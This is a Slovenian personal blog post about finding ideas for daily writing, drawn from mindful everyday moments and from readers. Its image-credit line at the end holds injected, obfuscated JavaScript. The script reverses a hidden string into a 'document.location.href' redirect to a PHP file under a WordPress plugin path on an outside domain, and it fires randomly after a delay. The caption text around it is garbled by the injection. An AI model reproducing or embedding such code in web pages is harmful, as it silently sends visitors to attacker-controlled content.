Od kje mi ideje?

Prve mesece mojega javnega pisanja sem naletela na oviro. Kje dobiti ideje za vsako-dnevno pisanje?

Nekaj časa sem imela kar probleme, da sem se domislila teme in priznam, veliko objav je slabih. A tekom časa in s pomočjo spleta, sem ugotovila kako pisati vsak dan.

Od nekje je potrebno dobiti inspiracijo. Najprej sem poskusila s seznami, ki so imeli po sto, dvesto možnih naslovov, a nekako se nisem uspela povezati z njimi. Tako sem ta način kmalu opustila. Blokado s pisanjem sem prebrodila šele takrat, ko sem se začela resnično zavedati pomembnosti posameznih trenutkov v življenju. Odkar sem začela s pisanjem, vidim veliko več trenutkov, ki so prav poslani zame, da jih uporabim. Da iz njih naredim nekaj velikega, vrednega, koristnega.

Moje pisanje se je začelo zgolj ljubiteljsko, zdaj pa ob tem čutim mnogo več. Čutim potrebo po tem, da z vami delim svoje občutke, misli in soočanja na poti do notranje rasti. Če to želim, moram biti večino dneva 100% prisotna, da ne zamudim kakšne pomembne lekcije. Tako so se v meni začele sprožati ideje, ki se ne bi še lep čas, če ne bi pisala.

Prihajajo ob najbolj preprostih trenutkih. Takrat, ko sem zaposlena z brez-miselnim delom, kot je tuširanje, zlaganje perila ali pomivanje posode. V takih trenutkih me velikokrat prešine in dobim idejo, katero zapišem v svoj zvezek. Tako se ideje počasi nabirajo in posledično imam vedno material za pisanje.

Drug vir motivacije so ljudje okoli mene. Veliko vas je takih, ki s svojim mnenjem sprožite moje razmišljanje. Za veliko idej ste v bistvu krivi vi, ki me spodbujate direktno ali posredno. Hvaležna sem vam, da ste kdor ste, ker samo tako lahko resnično vplivate na vašo okolico. V tem primeru name.

Še naprej bom zbirala material, iz njega razvila zgodbo in jo delila z vami z namenom, da se skupaj odpravimo po poti do sebe. Z namenom, da vam prikažem, kaj vse se dogaja v nas, ko gremo naprej. Z namenom, da širim ljubezen in svetlobo.

Dobrodošli v moj svet.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/writing?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash